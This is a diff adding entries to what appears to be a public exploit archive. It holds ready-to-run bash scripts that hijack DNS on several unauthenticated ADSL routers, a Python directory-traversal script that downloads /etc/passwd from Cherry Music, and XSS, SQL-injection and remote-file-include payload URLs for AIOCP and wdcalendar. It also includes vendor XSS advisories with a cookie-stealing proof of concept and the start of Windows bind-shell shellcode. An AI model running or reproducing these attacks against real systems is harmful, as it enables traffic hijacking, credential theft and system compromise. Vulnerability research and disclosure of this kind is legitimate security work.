||||
#
|
||||
# Copyright 2016 (c) Todor Donev <todor.donev at gmail.com>
|
||||
# https://www.ethical-hacker.org/
|
||||
# https://www.facebook.com/ethicalhackerorg
|
||||
#
|
||||
# Description:
|
||||
# The vulnerability exist in the web interface, which is
|
||||
# accessible without authentication.
|
||||
#
|
||||
# Once modified, systems use foreign DNS servers, which are
|
||||
# usually set up by cybercriminals. Users with vulnerable
|
||||
# systems or devices who try to access certain sites are
|
||||
# instead redirected to possibly malicious sites.
|
||||
#
|
||||
# Modifying systems' DNS settings allows cybercriminals to
|
||||
# perform malicious activities like:
|
||||
#
|
||||
# o Steering unknowing users to bad sites:
|
||||
# These sites can be phishing pages that
|
||||
# spoof well-known sites in order to
|
||||
# trick users into handing out sensitive
|
||||
# information.
|
||||
#
|
||||
# o Replacing ads on legitimate sites:
|
||||
# Visiting certain sites can serve users
|
||||
# with infected systems a different set
|
||||
# of ads from those whose systems are
|
||||
# not infected.
|
||||
#
|
||||
# o Controlling and redirecting network traffic:
|
||||
# Users of infected systems may not be granted
|
||||
# access to download important OS and software
|
||||
# updates from vendors like Microsoft and from
|
||||
# their respective security vendors.
|
||||
#
|
||||
# o Pushing additional malware:
|
||||
# Infected systems are more prone to other
|
||||
# malware infections (e.g., FAKEAV infection).
|
||||
#
|
||||
# Disclaimer:
|
||||
# This or previous programs is for Educational
|
||||
# purpose ONLY. Do not use it without permission.
|
||||
# The usual disclaimer applies, especially the
|
||||
# fact that Todor Donev is not liable for any
|
||||
# damages caused by direct or indirect use of the
|
||||
# information or functionality provided by these
|
||||
# programs. The author or any Internet provider
|
||||
# bears NO responsibility for content or misuse
|
||||
# of these programs or any derivatives thereof.
|
||||
# By using these programs you accept the fact
|
||||
# that any damage (dataloss, system crash,
|
||||
# system compromise, etc.) caused by the use
|
||||
# of these programs is not Todor Donev's
|
||||
# responsibility.
|
||||
#
|
||||
# Use them at your own risk!
|
||||
#
|
||||
#
|
||||
|
||||
if [[ $# -gt 3 || $# -lt 2 ]]; then
|
||||
echo " PLANET VDR-300NU ADSL ROUTER "
|
||||
echo " Unauthenticated Remote DNS Change Exploit"
|
||||
echo " ==================================================================="
|
||||
echo " Usage: $0 <Target> <Primary DNS> <Secondary DNS>"
|
||||
echo " Example: $0 133.7.133.7 8.8.8.8"
|
||||
echo " Example: $0 133.7.133.7 8.8.8.8 8.8.4.4"
|
||||
echo ""
|
||||
echo " Copyright 2016 (c) Todor Donev <todor.donev at gmail.com>"
|
||||
echo " https://www.ethical-hacker.org/ https://www.fb.com/ethicalhackerorg"
|
||||
exit;
|
||||
fi
|
||||
GET=`which GET 2>/dev/null`
|
||||
if [ $? -ne 0 ]; then
|
||||
echo " Error : libwww-perl not found =/"
|
||||
exit;
|
||||
fi
|
||||
GET -e "http://$1/dnscfg.cgi?dnsPrimary=$2&dnsSecondary=$3&dnsDynamic=0&dnsRefresh=1" 0&> /dev/null <&1
|
||||
|
82
platforms/cgi/webapps/40371.sh
Executable file
82
platforms/cgi/webapps/40371.sh
Executable file
|
@ -0,0 +1,82 @@
|
|||
#!/bin/bash
|
||||
#
|
||||
# Tenda ADSL2/2+ Modem 963281TAN
|
||||
# Unauthenticated Remote DNS Change Exploit
|
||||
#
|
||||
# Copyright 2016 (c) Todor Donev <todor.donev at gmail.com>
|
||||
# https://www.ethical-hacker.org/
|
||||
# https://www.facebook.com/ethicalhackerorg
|
||||
#
|
||||
# Description:
|
||||
# The vulnerability exist in the web interface, which is
|
||||
# accessible without authentication.
|
||||
#
|
||||
# Once modified, systems use foreign DNS servers, which are
|
||||
# usually set up by cybercriminals. Users with vulnerable
|
||||
# systems or devices who try to access certain sites are
|
||||
# instead redirected to possibly malicious sites.
|
||||
#
|
||||
# Modifying systems' DNS settings allows cybercriminals to
|
||||
# perform malicious activities like:
|
||||
#
|
||||
# o Steering unknowing users to bad sites:
|
||||
# These sites can be phishing pages that
|
||||
# spoof well-known sites in order to
|
||||
# trick users into handing out sensitive
|
||||
# information.
|
||||
#
|
||||
# o Replacing ads on legitimate sites:
|
||||
# Visiting certain sites can serve users
|
||||
# with infected systems a different set
|
||||
# of ads from those whose systems are
|
||||
# not infected.
|
||||
#
|
||||
# o Controlling and redirecting network traffic:
|
||||
# Users of infected systems may not be granted
|
||||
# access to download important OS and software
|
||||
# updates from vendors like Microsoft and from
|
||||
# their respective security vendors.
|
||||
#
|
||||
# o Pushing additional malware:
|
||||
# Infected systems are more prone to other
|
||||
# malware infections (e.g., FAKEAV infection).
|
||||
#
|
||||
# Disclaimer:
|
||||
# This or previous programs is for Educational
|
||||
# purpose ONLY. Do not use it without permission.
|
||||
# The usual disclaimer applies, especially the
|
||||
# fact that Todor Donev is not liable for any
|
||||
# damages caused by direct or indirect use of the
|
||||
# information or functionality provided by these
|
||||
# programs. The author or any Internet provider
|
||||
# bears NO responsibility for content or misuse
|
||||
# of these programs or any derivatives thereof.
|
||||
# By using these programs you accept the fact
|
||||
# that any damage (dataloss, system crash,
|
||||
# system compromise, etc.) caused by the use
|
||||
# of these programs is not Todor Donev's
|
||||
# responsibility.
|
||||
#
|
||||
# Use them at your own risk!
|
||||
#
|
||||
#
|
||||
|
||||
if [[ $# -gt 3 || $# -lt 2 ]]; then
|
||||
echo " Tenda ADSL2/2+ Modem 963281TAN "
|
||||
echo " Unauthenticated Remote DNS Change Exploit"
|
||||
echo " ==================================================================="
|
||||
echo " Usage: $0 <Target> <Primary DNS> <Secondary DNS>"
|
||||
echo " Example: $0 133.7.133.7 8.8.8.8"
|
||||
echo " Example: $0 133.7.133.7 8.8.8.8 8.8.4.4"
|
||||
echo ""
|
||||
echo " Copyright 2016 (c) Todor Donev <todor.donev at gmail.com>"
|
||||
echo " https://www.ethical-hacker.org/ https://www.fb.com/ethicalhackerorg"
|
||||
exit;
|
||||
fi
|
||||
GET=`which GET 2>/dev/null`
|
||||
if [ $? -ne 0 ]; then
|
||||
echo " Error : libwww-perl not found =/"
|
||||
exit;
|
||||
fi
|
||||
GET -e "http://$1/dnscfg.cgi?dnsPrimary=$2&dnsSecondary=$3&dnsDynamic=0&dnsRefresh=1" 0&> /dev/null <&1
|
||||
|
82
platforms/cgi/webapps/40372.sh
Executable file
82
platforms/cgi/webapps/40372.sh
Executable file
|
@ -0,0 +1,82 @@
|
|||
#!/bin/bash
|
||||
#
|
||||
# COMTREND ADSL Router CT-5367 C01_R12, CT-5624 C01_R03
|
||||
# Unauthenticated Remote DNS Change Exploit
|
||||
#
|
||||
# Copyright 2016 (c) Todor Donev <todor.donev at gmail.com>
|
||||
# https://www.ethical-hacker.org/
|
||||
# https://www.facebook.com/ethicalhackerorg
|
||||
#
|
||||
# Description:
|
||||
# The vulnerability exist in the web interface, which is
|
||||
# accessible without authentication.
|
||||
#
|
||||
# Once modified, systems use foreign DNS servers, which are
|
||||
# usually set up by cybercriminals. Users with vulnerable
|
||||
# systems or devices who try to access certain sites are
|
||||
# instead redirected to possibly malicious sites.
|
||||
#
|
||||
# Modifying systems' DNS settings allows cybercriminals to
|
||||
# perform malicious activities like:
|
||||
#
|
||||
# o Steering unknowing users to bad sites:
|
||||
# These sites can be phishing pages that
|
||||
# spoof well-known sites in order to
|
||||
# trick users into handing out sensitive
|
||||
# information.
|
||||
#
|
||||
# o Replacing ads on legitimate sites:
|
||||
# Visiting certain sites can serve users
|
||||
# with infected systems a different set
|
||||
# of ads from those whose systems are
|
||||
# not infected.
|
||||
#
|
||||
# o Controlling and redirecting network traffic:
|
||||
# Users of infected systems may not be granted
|
||||
# access to download important OS and software
|
||||
# updates from vendors like Microsoft and from
|
||||
# their respective security vendors.
|
||||
#
|
||||
# o Pushing additional malware:
|
||||
# Infected systems are more prone to other
|
||||
# malware infections (e.g., FAKEAV infection).
|
||||
#
|
||||
# Disclaimer:
|
||||
# This or previous programs is for Educational
|
||||
# purpose ONLY. Do not use it without permission.
|
||||
# The usual disclaimer applies, especially the
|
||||
# fact that Todor Donev is not liable for any
|
||||
# damages caused by direct or indirect use of the
|
||||
# information or functionality provided by these
|
||||
# programs. The author or any Internet provider
|
||||
# bears NO responsibility for content or misuse
|
||||
# of these programs or any derivatives thereof.
|
||||
# By using these programs you accept the fact
|
||||
# that any damage (dataloss, system crash,
|
||||
# system compromise, etc.) caused by the use
|
||||
# of these programs is not Todor Donev's
|
||||
# responsibility.
|
||||
#
|
||||
# Use them at your own risk!
|
||||
#
|
||||
#
|
||||
|
||||
if [[ $# -gt 3 || $# -lt 2 ]]; then
|
||||
echo " COMTREND ADSL Router CT-5367 C01_R12, CT-5624 C01_R03"
|
||||
echo " Unauthenticated Remote DNS Change Exploit"
|
||||
echo " ==================================================================="
|
||||
echo " Usage: $0 <Target> <Primary DNS> <Secondary DNS>"
|
||||
echo " Example: $0 133.7.133.7 8.8.8.8"
|
||||
echo " Example: $0 133.7.133.7 8.8.8.8 8.8.4.4"
|
||||
echo ""
|
||||
echo " Copyright 2016 (c) Todor Donev <todor.donev at gmail.com>"
|
||||
echo " https://www.ethical-hacker.org/ https://www.fb.com/ethicalhackerorg"
|
||||
exit;
|
||||
fi
|
||||
GET=`which GET 2>/dev/null`
|
||||
if [ $? -ne 0 ]; then
|
||||
echo " Error : libwww-perl not found =/"
|
||||
exit;
|
||||
fi
|
||||
GET -e "http://$1/dnscfg.cgi?dnsPrimary=$2&dnsSecondary=$3&dnsDynamic=0&dnsRefresh=1" 0&> /dev/null <&1
|
||||
|
81
platforms/cgi/webapps/40373.sh
Executable file
81
platforms/cgi/webapps/40373.sh
Executable file
|
@ -0,0 +1,81 @@
|
|||
#!/bin/bash
|
||||
#
|
||||
# ASUS DSL-X11 ADSL Router Unauthenticated Remote DNS Change Exploit
|
||||
#
|
||||
# Copyright 2016 (c) Todor Donev <todor.donev at gmail.com>
|
||||
# https://www.ethical-hacker.org/
|
||||
# https://www.facebook.com/ethicalhackerorg
|
||||
#
|
||||
# Description:
|
||||
# The vulnerability exist in the web interface, which is
|
||||
# accessible without authentication.
|
||||
#
|
||||
# Once modified, systems use foreign DNS servers, which are
|
||||
# usually set up by cybercriminals. Users with vulnerable
|
||||
# systems or devices who try to access certain sites are
|
||||
# instead redirected to possibly malicious sites.
|
||||
#
|
||||
# Modifying systems' DNS settings allows cybercriminals to
|
||||
# perform malicious activities like:
|
||||
#
|
||||
# o Steering unknowing users to bad sites:
|
||||
# These sites can be phishing pages that
|
||||
# spoof well-known sites in order to
|
||||
# trick users into handing out sensitive
|
||||
# information.
|
||||
#
|
||||
# o Replacing ads on legitimate sites:
|
||||
# Visiting certain sites can serve users
|
||||
# with infected systems a different set
|
||||
# of ads from those whose systems are
|
||||
# not infected.
|
||||
#
|
||||
# o Controlling and redirecting network traffic:
|
||||
# Users of infected systems may not be granted
|
||||
# access to download important OS and software
|
||||
# updates from vendors like Microsoft and from
|
||||
# their respective security vendors.
|
||||
#
|
||||
# o Pushing additional malware:
|
||||
# Infected systems are more prone to other
|
||||
# malware infections (e.g., FAKEAV infection).
|
||||
#
|
||||
# Disclaimer:
|
||||
# This or previous programs is for Educational
|
||||
# purpose ONLY. Do not use it without permission.
|
||||
# The usual disclaimer applies, especially the
|
||||
# fact that Todor Donev is not liable for any
|
||||
# damages caused by direct or indirect use of the
|
||||
# information or functionality provided by these
|
||||
# programs. The author or any Internet provider
|
||||
# bears NO responsibility for content or misuse
|
||||
# of these programs or any derivatives thereof.
|
||||
# By using these programs you accept the fact
|
||||
# that any damage (dataloss, system crash,
|
||||
# system compromise, etc.) caused by the use
|
||||
# of these programs is not Todor Donev's
|
||||
# responsibility.
|
||||
#
|
||||
# Use them at your own risk!
|
||||
#
|
||||
#
|
||||
|
||||
if [[ $# -gt 3 || $# -lt 2 ]]; then
|
||||
echo " ASUS DSL-X11 ADSL Router "
|
||||
echo " Unauthenticated Remote DNS Change Exploit"
|
||||
echo " ==================================================================="
|
||||
echo " Usage: $0 <Target> <Primary DNS> <Secondary DNS>"
|
||||
echo " Example: $0 133.7.133.7 8.8.8.8"
|
||||
echo " Example: $0 133.7.133.7 8.8.8.8 8.8.4.4"
|
||||
echo ""
|
||||
echo " Copyright 2016 (c) Todor Donev <todor.donev at gmail.com>"
|
||||
echo " https://www.ethical-hacker.org/ https://www.fb.com/ethicalhackerorg"
|
||||
exit;
|
||||
fi
|
||||
GET=`which GET 2>/dev/null`
|
||||
if [ $? -ne 0 ]; then
|
||||
echo " Error : libwww-perl not found =/"
|
||||
exit;
|
||||
fi
|
||||
GET -e "http://$1/dnscfg.cgi?dnsPrimary=$2&dnsSecondary=$3&dnsDynamic=0&dnsRefresh=1" 0&> /dev/null <&1
|
||||
|
89
platforms/linux/webapps/40377.txt
Executable file
89
platforms/linux/webapps/40377.txt
Executable file
|
@ -0,0 +1,89 @@
|
|||
Product: OX Guard
|
||||
Vendor: OX Software GmbH
|
||||
|
||||
Internal reference: 47878 (Bug ID)
|
||||
Vulnerability type: Cross Site Scripting (CWE-80)
|
||||
Vulnerable version: 2.4.2 and earlier
|
||||
Vulnerable component: guard
|
||||
Report confidence: Confirmed
|
||||
Solution status: Fixed by Vendor
|
||||
Fixed version: 2.4.0-rev11, 2.4.2-rev5
|
||||
Researcher credits: Benjamin Daniel Mussler (@dejavuln)
|
||||
Vendor notification: 2016-08-03
|
||||
Solution date: 2016-08-18
|
||||
Public disclosure: 2016-09-13
|
||||
CVE reference: CVE-2016-6854
|
||||
CVSS: 6.5 (CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:L/I:N/A:N)
|
||||
|
||||
Vulnerability Details:
|
||||
Script code which got injected to a mail with inline PGP signature gets executed when verifying the signature.
|
||||
|
||||
Risk:
|
||||
Malicious script code can be executed within a users context. This can lead to session hijacking or triggering unwanted actions via the web interface (sending mail, deleting data etc.).
|
||||
|
||||
Steps to reproduce:
|
||||
1. Add JS code to a mail body
|
||||
2. Use PGP inline signatures
|
||||
3. Open the mail in OX App Suite
|
||||
|
||||
Solution:
|
||||
Users should not open mail from untrusted sources. We made sure that the verified content does not get handled in a way that code can get executed. Operators should update to the latest Patch Release.
|
||||
|
||||
|
||||
|
||||
Internal reference: 47914 (Bug ID)
|
||||
Vulnerability type: Cross Site Scripting (CWE-80)
|
||||
Vulnerable version: 2.4.2 and earlier
|
||||
Vulnerable component: guard
|
||||
Report confidence: Confirmed
|
||||
Solution status: Fixed by Vendor
|
||||
Fixed version: 2.4.0-rev11, 2.4.2-rev5
|
||||
Researcher credits: secator
|
||||
Vendor notification: 2016-08-05
|
||||
Solution date: 2016-08-18
|
||||
Public disclosure: 2016-09-13
|
||||
CVE reference: CVE-2016-6853
|
||||
CVSS: 4.3 (CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:L/I:N/A:N)
|
||||
|
||||
Vulnerability Details:
|
||||
Script code and references to external websites can be injected to the names of PGP public keys. When requesting that key later on using a specific URL, such script code might get executed. In case of injecting external websites, users might get lured into a phishing scheme.
|
||||
|
||||
Risk:
|
||||
Malicious script code can be executed within a users context. This can lead to session hijacking or triggering unwanted actions via the web interface (sending mail, deleting data etc.).
|
||||
|
||||
Steps to reproduce:
|
||||
1. As attacker, create a PGP key with malicious name
|
||||
2. Get the key ID and create a link which will fetch that key
|
||||
3. Make the victim call that link
|
||||
|
||||
Solution:
|
||||
Users should not click links from untrusted sources. We now sanitize the returned key and make sure HTML content does not get interpreted by the browser. Operators should update to the latest Patch Release.
|
||||
|
||||
|
||||
|
||||
Internal reference: 48080 (Bug ID)
|
||||
Vulnerability type: Cross Site Scripting (CWE-80)
|
||||
Vulnerable version: 2.4.2 and earlier
|
||||
Vulnerable component: guard
|
||||
Report confidence: Confirmed
|
||||
Solution status: Fixed by Vendor
|
||||
Fixed version: 2.4.0-rev11, 2.4.2-rev5
|
||||
Researcher credits: Benjamin Daniel Mussler (@dejavuln)
|
||||
Vendor notification: 2016-08-15
|
||||
Solution date: 2016-08-18
|
||||
Public disclosure: 2016-09-13
|
||||
CVE reference: CVE-2016-6851
|
||||
CVSS: 4.3 (CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:L/I:N/A:N)
|
||||
|
||||
Vulnerability Details:
|
||||
Script code can be provided as parameter to the OX Guard guest reader web application. This allows cross-site scripting attacks against arbitrary users since no prior authentication is needed.
|
||||
|
||||
Risk:
|
||||
Malicious script code can be executed within a users context. This can lead to session hijacking or triggering unwanted actions via the web interface (sending mail, deleting data etc.) in case the user has a active session on the same domain already.
|
||||
|
||||
Steps to reproduce:
|
||||
1. As attacker, create a hyperlink with script code included at the "templid" parameter
|
||||
2. Make the victim open that link
|
||||
|
||||
Solution:
|
||||
Users should not click links from untrusted sources. We now sanitize the returned content for this parameter. Operators should update to the latest Patch Release.
|
91
platforms/linux/webapps/40378.txt
Executable file
91
platforms/linux/webapps/40378.txt
Executable file
|
@ -0,0 +1,91 @@
|
|||
Product: OX App Suite
|
||||
Vendor: OX Software GmbH
|
||||
|
||||
Internal reference: 46484 (Bug ID)
|
||||
Vulnerability type: Cross Site Scripting (CWE-80)
|
||||
Vulnerable version: 7.8.2 and earlier
|
||||
Vulnerable component: frontend
|
||||
Report confidence: Confirmed
|
||||
Solution status: Fixed by Vendor
|
||||
Fixed version: 7.6.2-rev46, 7.6.3-rev14, 7.8.0-rev29, 7.8.1-rev16, 7.8.2-rev5
|
||||
Vendor notification: 2016-06-09
|
||||
Solution date: 2016-08-01
|
||||
Public disclosure: 2016-09-13
|
||||
CVE reference: CVE-2016-5740
|
||||
CVSS: 4.3 (CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:L/I:N/A:N)
|
||||
|
||||
Vulnerability Details:
|
||||
Description fields of ressources could be used to inject malicious HTML/JS code. When scheduling group appointments and adding such a ressource, the injected code gets executed in the context of a user when viewing appointment details.
|
||||
|
||||
Risk:
|
||||
Malicious script code can be executed within a users context. This can lead to session hijacking or triggering unwanted actions via the web interface (sending mail, deleting data etc.). Note however that explicit permissions are required to create or modify resources in a way that they could contain script code.
|
||||
|
||||
Steps to reproduce:
|
||||
1. Provide HTML including script code as resource description
|
||||
2. Add this resource to a group appointment
|
||||
3. As group members, examine the appointment details.
|
||||
|
||||
Solution:
|
||||
Permission settings can be temporarily tightened to reject resource modifications by users. Such descriptions are now handled as plain-text to avoid any kind of script execution. Operators should update to the latest Patch Release.
|
||||
|
||||
|
||||
Internal reference: 46894 (Bug ID)
|
||||
Vulnerability type: Cross Site Scripting (CWE-80)
|
||||
Vulnerable version: 7.8.2 and earlier
|
||||
Vulnerable component: backend
|
||||
Researcher credits: Jakub A>>oczek
|
||||
Report confidence: Confirmed
|
||||
Solution status: Fixed by Vendor
|
||||
Fixed version: 7.6.2-rev58, 7.6.3-rev14, 7.8.0-rev36, 7.8.1-rev18, 7.8.2-rev5
|
||||
Vendor notification: 2016-06-27
|
||||
Solution date: 2016-08-01
|
||||
Public disclosure: 2016-09-13
|
||||
CVE reference: CVE-2016-5740
|
||||
CVSS: 4.3 (CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:L/I:N/A:N)
|
||||
|
||||
Vulnerability Details:
|
||||
Script code can be injected to HTML E-Mail hyperlinks by using the "data" schema. This method bypasses existing sanitization methods. As a result the script code got injected to hyperlinks displayed at OX App Suite UI.
|
||||
|
||||
Risk:
|
||||
Malicious script code can be executed within a users context. This can lead to session hijacking or triggering unwanted actions via the web interface (sending mail, deleting data etc.).
|
||||
|
||||
Steps to reproduce:
|
||||
1. Compose malicious mail with a link containing a "data" schema with JS code included
|
||||
2. Make a user click the link
|
||||
|
||||
Proof of concept:
|
||||
<a href="data:text/html,<script>alert(document.cookie);</script>">click me</a>
|
||||
|
||||
Solution:
|
||||
Users should not or interact with mails from untrusted external sources. Targets of hyperlinks shall be examined before clicking the respective link. Operators should update to the latest Patch Release.
|
||||
|
||||
|
||||
Internal reference: 47062 (Bug ID)
|
||||
Vulnerability type: Cross Site Scripting (CWE-80)
|
||||
Vulnerable version: 7.8.2 and earlier
|
||||
Vulnerable component: backend
|
||||
Report confidence: Confirmed
|
||||
Solution status: Fixed by Vendor
|
||||
Fixed version: 7.6.2-rev58, 7.6.3-rev14, 7.8.0-rev36, 7.8.1-rev18, 7.8.2-rev5
|
||||
Vendor notification: 2016-06-27
|
||||
Solution date: 2016-08-01
|
||||
Public disclosure: 2016-09-13
|
||||
CVE reference: CVE-2016-5740
|
||||
CVSS: 4.3 (CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:L/I:N/A:N)
|
||||
|
||||
Vulnerability Details:
|
||||
Script code can be stored to the temporary storage for inline-images in HTML E-Mails. Content is available to the user who stored it but also to other (external) users if the unique random ID is known. Note that this storage is volatile and expires if not regulary refreshed. A attacker could however re-upload and refresh the file once uploaded.
|
||||
|
||||
Risk:
|
||||
Malicious script code can be executed within a users context. This can lead to session hijacking or triggering unwanted actions via the web interface (sending mail, deleting data etc.).
|
||||
|
||||
Steps to reproduce:
|
||||
1. Create a file with script code that gets rendered within the browser, e.g. a SVG image with XSL headers
|
||||
2. Alter the upload request for file?action=new from "image" to "file" to circumvent image related checks
|
||||
3. Set a MIME-type that makes the browser render the file content inline instead of downloading
|
||||
4. Fetch the returned UUID
|
||||
5. Create a link which includes the storage location for the specific item
|
||||
6. Make a user click that link
|
||||
|
||||
Solution:
|
||||
Users should not open hyperlinks from untrusted sources. Operators should update to the latest Patch Release.
|
|
@ -1,9 +1,71 @@
|
|||
source: http://www.securityfocus.com/bid/20931/info
|
||||
|
||||
All In One Control Panel (AIOCP) is prone to multiple input-validation vulnerabilities because it fails to sufficiently sanitize user-supplied input data.
|
||||
|
||||
|
||||
Exploiting these issues could allow an attacker to steal cookie-based authentication credentials, access or modify sensitive data, execute arbitrary script code in the context of the application, compromise the application and possibly exploit latent vulnerabilities in the underlying system; other attacks are also possible.
|
||||
|
||||
|
||||
AIOCP 1.3.007 and prior versions are vulnerable.
|
||||
|
||||
http://www.example.com/public/code/cp_dpage.php?choosed_language=eng&aiocp_dp[]=_main
|
||||
|
||||
Cross-site scripting =
|
||||
-
|
||||
http://www.example.com/public/code/cp_forum_view.php?fmode=top&topid=</textarea>'"><script>alert(document.cookie)</script>
|
||||
-
|
||||
http://www.example.com/public/code/cp_forum_view.php?fmode=top&topid=53&forid=</textarea>'"><script>alert(document.cookie)</script>
|
||||
-
|
||||
http://www.example.com/public/code/cp_forum_view.php?fmode=top&topid=53&forid=23&catid=</textarea>'"><script>alert(document.cookie)</script>
|
||||
-
|
||||
http://www.example.com/public/code/cp_dpage.php?choosed_language=</textarea>'"><script>alert(document.cookie)</script>
|
||||
-
|
||||
http://www.example.com/public/code/cp_forum_view.php?fmode=top&topid=53&forid=</textarea>'"><script>alert(document.cookie)</script>
|
||||
-
|
||||
http://www.example.com/public/code/cp_forum_view.php?fmode=top&topid=53&forid=3&catid=</textarea>'"><script>alert(document.cookie)</script>
|
||||
-
|
||||
http://www.example.com/public/code/cp_show_ec_products.php?order_field=</textarea>'"><script>alert(document.cookie)</script>
|
||||
-
|
||||
http://www.example.com/public/code/cp_users_online.php?order_field=</textarea>'"><script>alert(document.cookie)</script>
|
||||
-
|
||||
http://www.example.com/public/code/cp_links_search.php?orderdir=</textarea>'"><script>alert(document.cookie)</script>
|
||||
|
||||
Remote File-Include =
|
||||
/admin/code/index.php?load_page=http%3A//google.com
|
||||
( no login needed for the remote file include )
|
||||
|
||||
SQL-Injection =
|
||||
- http://www.example.com/public/code/cp_dpage.php?choosed_language=[sql]
|
||||
- http://www.example.com/public/code/cp_news.php?choosed_language=[sql]
|
||||
- http://www.example.com/public/code/cp_news.php?news_category=[sql]
|
||||
-
|
||||
http://www.example.com/public/code/cp_forum_view.php?choosed_language=[sql]
|
||||
-
|
||||
http://www.example.com/public/code/cp_edit_user.php?choosed_language=[sql]
|
||||
-
|
||||
http://www.example.com/public/code/cp_newsletter.php?nlmsg_nlcatid=[sql]
|
||||
-
|
||||
http://www.example.com/public/code/cp_newsletter.php?choosed_language=[sql]
|
||||
- http://www.example.com/public/code/cp_links.php?links_category=[sql]
|
||||
- http://www.example.com/public/code/cp_links.php?choosed_language=[sql]
|
||||
-
|
||||
http://www.example.com/public/code/cp_contact_us.php?choosed_language=[sql]
|
||||
-
|
||||
http://www.example.com/public/code/cp_show_ec_products.php?product_category_id=[sql]
|
||||
-
|
||||
http://www.example.com/public/code/cp_show_ec_products.php?product_category_id=[sql]
|
||||
-
|
||||
http://www.example.com/public/code/cp_show_ec_products.php?order_field=[sql]
|
||||
- http://www.example.com/public/code/cp_login.php?choosed_language=[sql]
|
||||
-
|
||||
http://www.example.com/public/code/cp_users_online.php?order_field=cpsession_expiry&submitted=1&firstrow=[sql]
|
||||
-
|
||||
http://www.example.com/public/code/cp_codice_fiscale.php?choosed_language=[sql]
|
||||
- http://www.example.com/public/code/cp_links_search.php?orderdir=[sql]
|
||||
|
||||
|
||||
Full Path Disclosure =
|
||||
-
|
||||
http://www.example.com/public/code/cp_dpage.php?choosed_language=eng&aiocp_dp[]=_main
|
||||
-
|
||||
http://www.example.com/public/code/cp_show_ec_products.php?order_field[]=
|
||||
- http://www.example.com/public/code/cp_show_page_help.php?hp[]=
|
||||
|
||||
|
||||
|
|
36
platforms/php/webapps/40361.py
Executable file
36
platforms/php/webapps/40361.py
Executable file
|
@ -0,0 +1,36 @@
|
|||
# Exploit Title: Cherry Music v0.35.1 directory traversal vulnerability allows authenticated users to download arbitrary files
|
||||
# Date: 11-09-2016
|
||||
# Exploit Author: feedersec
|
||||
# Contact: feedersec@gmail.com
|
||||
# Vendor Homepage: http://www.fomori.org/cherrymusic/index.html
|
||||
# Software Link: http://www.fomori.org/cherrymusic/versions/cherrymusic-0.35.1.tar.gz
|
||||
# Version: 0.35.1
|
||||
# Tested on: ubuntu 14.04 LTS
|
||||
# CVE : CVE-2015-8309
|
||||
|
||||
import urllib2, cookielib, urllib
|
||||
|
||||
#set parameters here
|
||||
username = 'admin'
|
||||
password = 'Password01'
|
||||
baseUrl = 'http://localhost:8080/'
|
||||
targetFile = '/etc/passwd'
|
||||
downloadFileName = 'result.zip'
|
||||
####
|
||||
|
||||
cj = cookielib.CookieJar()
|
||||
opener = urllib2.build_opener(urllib2.HTTPCookieProcessor(cj))
|
||||
params = urllib.urlencode({'username': username, 'password': password, 'login': 'login'})
|
||||
req = urllib2.Request(baseUrl, params)
|
||||
response = opener.open(req)
|
||||
for c in cj:
|
||||
if c.name == "session_id":
|
||||
session_id = c.value
|
||||
|
||||
opener = urllib2.build_opener(urllib2.HTTPCookieProcessor(cj))
|
||||
opener.addheaders.append(('Cookie', 'session_id=' + session_id))
|
||||
params = urllib.urlencode({'value': '["' + targetFile + '"]'})
|
||||
request = urllib2.Request(baseUrl + "download", params)
|
||||
response = opener.open(request).read()
|
||||
with open(downloadFileName, 'wb') as zipFile:
|
||||
zipFile.write(response)
|
32
platforms/php/webapps/40364.txt
Executable file
32
platforms/php/webapps/40364.txt
Executable file
|
@ -0,0 +1,32 @@
|
|||
# Exploit Title: wdcalendar version 2 sql injection vulnerability
|
||||
# Google Dork: allinurl:"wdcalendar/edit.php"
|
||||
# Date: 12/09/2016
|
||||
# Exploit Author: Alfonso Castillo Angel
|
||||
# Software Link: https://github.com/ronisaha/wdCalendar
|
||||
# Version: Version 2
|
||||
# Tested on: Windows 7 ultimate
|
||||
# Category: webapps
|
||||
|
||||
* Affected file -> edit.php and edit.db.php
|
||||
* Exploit ->
|
||||
http://localhost/wdcalendar/edit.php?id=-1+union+select+1,version(),user(),4,5,6,7,8,9--
|
||||
|
||||
|
||||
* Vulnerable code:
|
||||
|
||||
function getCalendarByRange($id){
|
||||
try{
|
||||
$db = new DBConnection();
|
||||
$db->getConnection();
|
||||
$sql = "select * from `jqcalendar` where `id` = " . $id; //the
|
||||
variable is not filtered properly
|
||||
$handle = mysql_query($sql);
|
||||
//echo $sql;
|
||||
$row = mysql_fetch_object($handle);
|
||||
}catch(Exception $e){
|
||||
}
|
||||
return $row;
|
||||
}
|
||||
if($_GET["id"]){
|
||||
$event = getCalendarByRange($_GET["id"]); //the variable is not filtered
|
||||
properly
|
736
platforms/win_x86/shellcode/40363.c
Executable file
736
platforms/win_x86/shellcode/40363.c
Executable file
|
@ -0,0 +1,736 @@
|
|||
/*
|
||||
# Title : Windows x86 password protected bind shell tcp shellcode
|
||||
# Date : 12-09-2016
|
||||
# Author : Roziul Hasan Khan Shifat
|
||||
# size : 637 bytes
|
||||
# Tested On : Windows 7 ultimate x86 x64
|
||||
# Email : shifath12@gmail.com
|
||||
*/
|
||||
|
||||
/*
|
||||
Disassembly of section .text:
|
||||
|
||||
00000000 <_start>:
|
||||
0: 99 cltd
|
||||
1: 64 8b 42 30 mov %fs:0x30(%edx),%eax
|
||||
5: 8b 40 0c mov 0xc(%eax),%eax
|
||||
8: 8b 70 14 mov 0x14(%eax),%esi
|
||||
b: ad lods %ds:(%esi),%eax
|
||||
c: 96 xchg %eax,%esi
|
||||
d: ad lods %ds:(%esi),%eax
|
||||
e: 8b 78 10 mov 0x10(%eax),%edi
|
||||
11: 8b 5f 3c mov 0x3c(%edi),%ebx
|
||||
14: 01 fb add %edi,%ebx
|
||||
16: 8b 5b 78 mov 0x78(%ebx),%ebx
|
||||
19: 01 fb add %edi,%ebx
|
||||
1b: 8b 73 20 mov 0x20(%ebx),%esi
|
||||
1e: 01 fe add %edi,%esi
|
||||
|
||||
00000020 <g>:
|
||||
20: 42 inc %edx
|
||||
21: ad lods %ds:(%esi),%eax
|
||||
22: 01 f8 add %edi,%eax
|
||||
24: 81 38 47 65 74 50 cmpl $0x50746547,(%eax)
|
||||
2a: 75 f4 jne 20 <g>
|
||||
